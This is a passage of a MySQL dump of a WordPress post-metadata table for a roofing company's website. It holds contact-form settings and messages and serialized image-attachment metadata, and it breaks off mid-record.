/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp0y_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=752 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp0y_postmeta`
--

LOCK TABLES `wp0y_postmeta` WRITE;
/*!40000 ALTER TABLE `wp0y_postmeta` DISABLE KEYS */;
INSERT INTO `wp0y_postmeta` VALUES (5,6,'_form','<label> Your name\n    [text* your-name] </label>\n\n<label> Your email\n    [email* your-email] </label>\n\n<label> Subject\n    [text* your-subject] </label>\n\n<label> Your message (optional)\n    [textarea your-message] </label>\n\n[submit \"Submit\"]'),(6,6,'_mail','a:9:{s:6:\"active\";b:1;s:7:\"subject\";s:29:\"Dunrite Roof \"[your-subject]\"\";s:6:\"sender\";s:37:\"[_site_title] <admin@dunriteroof.com>\";s:9:\"recipient\";s:21:\"admin@dunriteroof.com\";s:4:\"body\";s:163:\"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\";s:18:\"additional_headers\";s:22:\"Reply-To: [your-email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(7,6,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:30:\"[_site_title] \"[your-subject]\"\";s:6:\"sender\";s:33:\"[_site_title] <admin@cteisys.com>\";s:9:\"recipient\";s:12:\"[your-email]\";s:4:\"body\";s:105:\"Message Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\";s:18:\"additional_headers\";s:29:\"Reply-To: [_site_admin_email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(8,6,'_messages','a:22:{s:12:\"mail_sent_ok\";s:45:\"Thank you for your message. It has been sent.\";s:12:\"mail_sent_ng\";s:71:\"There was an error trying to send your message. Please try again later.\";s:16:\"validation_error\";s:61:\"One or more fields have an error. Please check and try again.\";s:4:\"spam\";s:71:\"There was an error trying to send your message. Please try again later.\";s:12:\"accept_terms\";s:69:\"You must accept the terms and conditions before sending your message.\";s:16:\"invalid_required\";s:27:\"Please fill out this field.\";s:16:\"invalid_too_long\";s:32:\"This field has a too long input.\";s:17:\"invalid_too_short\";s:33:\"This field has a too short input.\";s:13:\"upload_failed\";s:46:\"There was an unknown error uploading the file.\";s:24:\"upload_file_type_invalid\";s:49:\"You are not allowed to upload files of this type.\";s:21:\"upload_file_too_large\";s:31:\"The uploaded file is too large.\";s:23:\"upload_failed_php_error\";s:38:\"There was an error uploading the file.\";s:12:\"invalid_date\";s:41:\"Please enter a date in YYYY-MM-DD format.\";s:14:\"date_too_early\";s:32:\"This field has a too early date.\";s:13:\"date_too_late\";s:31:\"This field has a too late date.\";s:14:\"invalid_number\";s:22:\"Please enter a number.\";s:16:\"number_too_small\";s:34:\"This field has a too small number.\";s:16:\"number_too_large\";s:34:\"This field has a too large number.\";s:23:\"quiz_answer_not_correct\";s:36:\"The answer to the quiz is incorrect.\";s:13:\"invalid_email\";s:30:\"Please enter an email address.\";s:11:\"invalid_url\";s:19:\"Please enter a URL.\";s:11:\"invalid_tel\";s:32:\"Please enter a telephone number.\";}'),(9,6,'_additional_settings',''),(10,6,'_locale','en_US'),(12,8,'_wp_attached_file','2022/08/log_file_2022-08-22__00-25-25.txt'),(13,15,'_wp_attached_file','2021/05/video-bg.jpg'),(14,15,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1400;s:6:\"height\";i:567;s:4:\"file\";s:20:\"2021/05/video-bg.jpg\";s:8:\"filesize\";i:75160;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"video-bg-300x122.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:122;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6706;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"video-bg-1024x415.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:415;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42774;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"video-bg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3914;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"video-bg-768x311.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27589;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:20:\"video-bg-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13747;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:19:\"video-bg-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1983;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(15,16,'_wp_attached_file','2021/05/blog-img.jpg'),(16,16,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:560;s:6:\"height\";i:400;s:4:\"file\";s:20:\"2021/05/blog-img.jpg\";s:8:\"filesize\";i:53731;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"blog-img-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19372;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"blog-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8227;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:20:\"blog-img-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29322;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:19:\"blog-img-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3916;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(17,17,'_wp_attached_file','2021/05/blog-img2.jpg'),(18,17,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:560;s:6:\"height\";i:400;s:4:\"file\";s:21:\"2021/05/blog-img2.jpg\";s:8:\"filesize\";i:38720;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"blog-img2-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8701;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"blog-img2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3783;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:21:\"blog-img2-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13316;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:20:\"blog-img2-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1862;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(19,18,'_wp_attached_file','2021/05/call-icon.png'),(20,18,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:23;s:6:\"height\";i:24;s:4:\"file\";s:21:\"2021/05/call-icon.png\";s:8:\"filesize\";i:593;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(21,19,'_wp_attached_file','2021/05/email-icon.png'),(22,19,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:23;s:6:\"height\";i:16;s:4:\"file\";s:22:\"2021/05/email-icon.png\";s:8:\"filesize\";i:451;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23,20,'_wp_attached_file','2021/05/faq-img.jpg'),(24,20,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:545;s:6:\"height\";i:546;s:4:\"file\";s:19:\"2021/05/faq-img.jpg\";s:8:\"filesize\";i:54654;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"faq-img-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19494;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"faq-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6635;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:19:\"faq-img-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24550;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:18:\"faq-img-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3356;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(25,21,'_wp_attached_file','2021/05/instruction-img.jpg'),(26,21,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:420;s:6:\"height\";i:557;s:4:\"file\";s:27:\"2021/05/instruction-img.jpg\";s:8:\"filesize\";i:36708;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:27:\"instruction-img-226x300.jpg\";s:5:\"width\";i:226;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12318;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:27:\"instruction-img-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5051;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:27:\"instruction-img-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14793;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:26:\"instruction-img-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2501;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(27,22,'_wp_attached_file','2021/05/instruction-imgi-bg.png'),(28,22,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:250;s:6:\"height\";i:411;s:4:\"file\";s:31:\"2021/05/instruction-imgi-bg.png\";s:8:\"filesize\";i:11206;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"instruction-imgi-bg-182x300.png\";s:5:\"width\";i:182;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24238;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"instruction-imgi-bg-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9421;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:31:\"instruction-imgi-bg-250x270.png\";s:5:\"width\";i:250;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:21337;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:30:\"instruction-imgi-bg-100x84.png\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3053;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(29,23,'_wp_attached_file','2021/05/project-img1.jpg'),(30,23,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:42;s:6:\"height\";i:42;s:4:\"file\";s:24:\"2021/05/project-img1.jpg\";s:8:\"filesize\";i:1904;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(31,24,'_wp_attached_file','2021/05/project-img2.jpg'),(32,24,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:44;s:6:\"height\";i:37;s:4:\"file\";s:24:\"2021/05/project-img2.jpg\";s:8:\"filesize\";i:1479;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(33,25,'_wp_attached_file','2021/05/project-img3.jpg'),(34,25,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:67;s:6:\"height\";i:67;s:4:\"file\";s:24:\"2021/05/project-img3.jpg\";s:8:\"filesize\";i:1929;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(35,26,'_wp_attached_file','2021/05/project-img4.jpg'),(36,26,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:42;s:6:\"height\";i:42;s:4:\"file\";s:24:\"2021/05/project-img4.jpg\";s:8:\"filesize\";i:1904;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(37,27,'_wp_attached_file','2021/05/services-img1.jpg'),(38,27,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:65;s:6:\"height\";i:65;s:4:\"file\";s:25:\"2021/05/services-img1.jpg\";s:8:\"filesize\";i:3709;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(39,28,'_wp_attached_file','2021/05/services-img2.jpg'),(40,28,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:77;s:6:\"height\";i:65;s:4:\"file\";s:25:\"2021/05/services-img2.jpg\";s:8:\"filesize\";i:3796;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(41,29,'_wp_attached_file','2021/05/services-img3.jpg'),(42,29,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:59;s:6:\"height\";i:67;s:4:\"file\";s:25:\"2021/05/services-img3.jpg\";s:8:\"filesize\";i:2302;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(43,30,'_wp_attached_file','2021/05/services-img4.jpg'),(44,30,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:57;s:6:\"height\";i:66;s:4:\"file\";s:25:\"2021/05/services-img4.jpg\";s:8:\"filesize\";i:2845;s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(45,31,'_wp_attached_file','2021/05/team-member1.jpg'),(46,31,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:269;s:6:\"height\";i:300;s:4:\"file\";s:24:\"2021/05/team-member1.jpg\";s:8:\"filesize\";i:37014;s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"team-member1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8569;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:24:\"team-member1-269x270.jpg\";s:5:\"width\";i:269;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20994;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:23:\"team-member1-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4464;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(47,32,'_wp_attached_file','2021/05/team-member2.jpg'),(48,32,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:272;s:6:\"height\";i:300;s:4:\"file\";s:24:\"2021/05/team-member2.jpg\";s:8:\"filesize\";i:29570;s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"team-member2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6750;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:24:\"team-member2-272x270.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18222;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:23:\"team-member2-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3218;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(49,34,'_wp_attached_file','2021/05/slider2.jpg'),(50,34,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1400;s:6:\"height\";i:816;s:4:\"file\";s:19:\"2021/05/slider2.jpg\";s:8:\"filesize\";i:218442;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"slider2-300x175.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11263;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"slider2-1024x597.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:597;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97540;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"slider2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5815;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"slider2-768x448.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:448;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58429;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:19:\"slider2-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21726;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:18:\"slider2-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2634;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(52,35,'_wp_attached_file','2021/05/slider3.jpg'),(53,35,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1400;s:6:\"height\";i:816;s:4:\"file\";s:19:\"2021/05/slider3.jpg\";s:8:\"filesize\";i:176082;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"slider3-300x175.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:175;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7743;}s:5:\"large\";a:5:{s:4:\"file\";s:20:\"slider3-1024x597.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:597;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66221;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"slider3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3096;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"slider3-768x448.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:448;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39222;}s:14:\"complete_thumb\";a:5:{s:4:\"file\";s:19:\"slider3-400x270.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:270;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13450;}s:11:\"footerthumb\";a:5:{s:4:\"file\";s:18:\"slider3-100x84.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:84;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1646;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8: